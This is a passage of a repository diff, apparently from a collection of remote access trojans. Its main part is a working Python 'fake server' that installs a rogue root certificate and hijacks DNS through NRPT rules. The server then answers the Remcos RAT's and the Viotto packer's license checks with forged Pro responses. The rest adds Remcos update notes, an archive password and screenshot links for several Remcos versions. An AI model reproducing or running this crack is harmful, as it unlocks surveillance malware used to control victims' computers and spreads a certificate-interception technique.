print(f" ***** KeyGen LicPost! *****")
print(f" Parts: {parts}")
# Try response matching request format: pipe-delimited after "0\n"
key = parts[0] if len(parts) > 0 else ""
email = parts[1] if len(parts) > 1 else ""
# Format: 0\nkey|email|product|expiry|type|version
resp = f"0\n{key}|{email}|Remcos|20301231|Pro|7.2.2"
print(f" <- Responding: '{resp}'")
self.send_text(resp)
return
if "upd_pro" in path:
print(f" <- Version: {VERSION}")
self.send_text(VERSION + "\n")
return
# PeriodicCheck - license validation with hash + expiry
if "periodiccheck" in path:
lic = qs.get("LIC", ["?"])[0]
resp = "49ef9592748fac8986f0d360454dbab0\n20301231\nRemcos"
print(f" ***** PeriodicCheck (LIC={lic[:24]}) -> {repr(resp)} *****")
self.send_text(resp)
return
# Auth/license check - sign with our private key
if "auth" in path or "check" in path or "verify" in path or "validate" in path:
print(f" ***** Auth endpoint: {self.path} *****")
self.send_text("0\n20301231\nPro\n7.2.2")
return
if "onlinecheck" in path:
print(f" <- OnlineCheck: {VERSION}")
self.send_text(VERSION + "\n")
return
if "/line" in path or "ip-api" in host:
print(f" <- GeoIP")
self.send_text(GEO_RESPONSE + "\n")
return
print(f" *** UNKNOWN ENDPOINT: {self.path} ***")
print(f" *** Host: {host} ***")
# Return "0" instead of empty - empty might cause range check errors
self.send_text("0")
def do_GET(self): self.route()
def do_POST(self):
cl = int(self.headers.get("Content-Length", 0))
body = self.rfile.read(cl) if cl > 0 else b""
if body:
try: print(f" POST body: {body[:300].decode('utf-8', errors='replace')}")
except: print(f" POST body: {body[:100].hex()}")
self.route()
# ============================================================
# Main
# ============================================================
def main():
print("=" * 60)
print(" Fake Server (standalone) - stays running")
print(" Launch Remcos/KeyGen yourself while this runs")
print("=" * 60)
if not ctypes.windll.shell32.IsUserAnAdmin():
print("[-] Need Administrator! Right-click -> Run as admin")
return 1
# Setup
generate_certs()
install_ca()
# CA bundle for OpenSSL apps
ca_bundle = os.path.join(CERT_DIR, "ca_bundle.pem")
try:
import certifi
system_ca = certifi.where()
except ImportError:
system_ca = None
with open(ca_bundle, "w") as out:
with open(CA_CERT) as f: out.write(f.read() + "\n")
if system_ca and os.path.exists(system_ca):
with open(system_ca) as f: out.write(f.read())
os.environ["SSL_CERT_FILE"] = ca_bundle
os.environ["SSL_CERT_DIR"] = CERT_DIR
# Start servers
dns = socketserver.UDPServer(("127.0.0.1", 53), DNSHandler)
threading.Thread(target=dns.serve_forever, daemon=True).start()
print("[+] DNS on 127.0.0.1:53")
http_srv = http.server.HTTPServer(("0.0.0.0", 80), FakeHandler)
threading.Thread(target=http_srv.serve_forever, daemon=True).start()
print("[+] HTTP on 0.0.0.0:80")
try:
class LoggingHTTPS(http.server.HTTPServer):
def handle_error(self, request, client_address):
print(f" [SSL ERROR] from {client_address}: {sys.exc_info()[1]}")
https_srv = LoggingHTTPS(("0.0.0.0", 443), FakeHandler)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain(SRV_CERT, SRV_KEY)
https_srv.socket = ctx.wrap_socket(https_srv.socket, server_side=True)
threading.Thread(target=https_srv.serve_forever, daemon=True).start()
print("[+] HTTPS on 0.0.0.0:443")
except Exception as e:
print(f"[-] HTTPS failed: {e}")
# Port 45000 - Viotto packer license validation (raw TCP protocol!)
def handle_viotto_client(conn, addr):
print(f"\n *** PORT 45000 CONNECTION from {addr} ***")
conn.settimeout(5)
try:
# Read whatever the client sends
data = conn.recv(4096)
print(f" *** RECEIVED ({len(data)} bytes): {data[:200].hex()}")
try:
print(f" *** AS TEXT: {data[:200].decode('ascii', errors='replace')}")
except:
pass
# Echo back for now - we need to see the protocol first
conn.sendall(data)
print(f" *** Echoed {len(data)} bytes back")
except socket.timeout:
print(f" *** PORT 45000: recv timeout (client didn't send data)")
except Exception as e:
print(f" *** PORT 45000 error: {e}")
finally:
conn.close()
def viotto_server():
srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srv.bind(("0.0.0.0", 45000))
srv.listen(5)
print("[+] Raw TCP on 0.0.0.0:45000 (Viotto license port!)")
while True:
conn, addr = srv.accept()
threading.Thread(target=handle_viotto_client, args=(conn, addr), daemon=True).start()
threading.Thread(target=viotto_server, daemon=True).start()
# NRPT
setup_nrpt()
# Verify
time.sleep(1)
for domain in ["breakingsec.io", "breakingsecurity.net"]:
try:
result = socket.getaddrinfo(domain, 443)
ip = result[0][4][0]
status = "OK" if ip == "127.0.0.1" else f"WRONG ({ip})"
print(f" {domain} -> {ip} [{status}]")
except Exception as e:
print(f" {domain} -> ERROR: {e}")
print()
print("=" * 60)
print(" RUNNING. Now launch KeyGen.exe or Remcos manually.")
print(" Press Ctrl+C to stop and clean up.")
print("=" * 60)
print()
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
pass
finally:
print("\n[*] Cleaning up...")
cleanup_nrpt()
print("[+] NRPT removed")
remove_ca()
print("[+] CA removed")
import ctypes
if __name__ == "__main__":
sys.exit(main())
@@ -0,0 +1,9 @@
UPDATE NOTES:
To keep the configuration of your previous Remcos version (including connection ports, settings...),
just move the new Remcos exe file into your previous Remcos folder.
Remcos is a portable application and stores all of its settings in its current folder.
Remcos_Settings.ini : General Configuration
tls : TLS Keys and Certificates
BuilderProfiles : Builder Profiles
@@ -0,0 +1,2 @@
Zip password is:
BreakingSecurity.net
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
+1
View File
@@ -0,0 +1 @@
![Screenshot](https://raw.githubusercontent.com/Cryakl/Ultimate-RAT-Collection/refs/heads/main/Remcos/Remcos%20v1.1.1%20Free/Screenshot.png)
Binary file not shown.
Binary file not shown.

After

Width:  |  Height:  |  Size: 26 KiB

@@ -0,0 +1 @@
![Screenshot](https://raw.githubusercontent.com/Cryakl/Ultimate-RAT-Collection/refs/heads/main/Remcos/Remcos%20v1.7%20Professional/Screenshot.png)
Binary file not shown.

After

Width:  |  Height:  |  Size: 27 KiB

+1
View File
@@ -0,0 +1 @@
![Screenshot](https://raw.githubusercontent.com/Cryakl/Ultimate-RAT-Collection/refs/heads/main/Remcos/Remcos%20v2.2.0%20Light/Screenshot.png)
Binary file not shown.
Binary file not shown.

After

Width:  |  Height:  |  Size: 26 KiB

+1
View File
@@ -0,0 +1 @@
![Screenshot](https://raw.githubusercontent.com/Cryakl/Ultimate-RAT-Collection/refs/heads/main/Remcos/Remcos%20v2.5.0%20Light/Screenshot.png)
Binary file not shown.

After

Width:  |  Height:  |  Size: 27 KiB

@@ -0,0 +1 @@
![Screenshot](https://raw.githubusercontent.com/Cryakl/Ultimate-RAT-Collection/refs/heads/main/Remcos/Remcos%20v3.8.0%20Professional/Screenshot.png)
Binary file not shown.
Binary file not shown.

After

Width:  |  Height:  |  Size: 13 KiB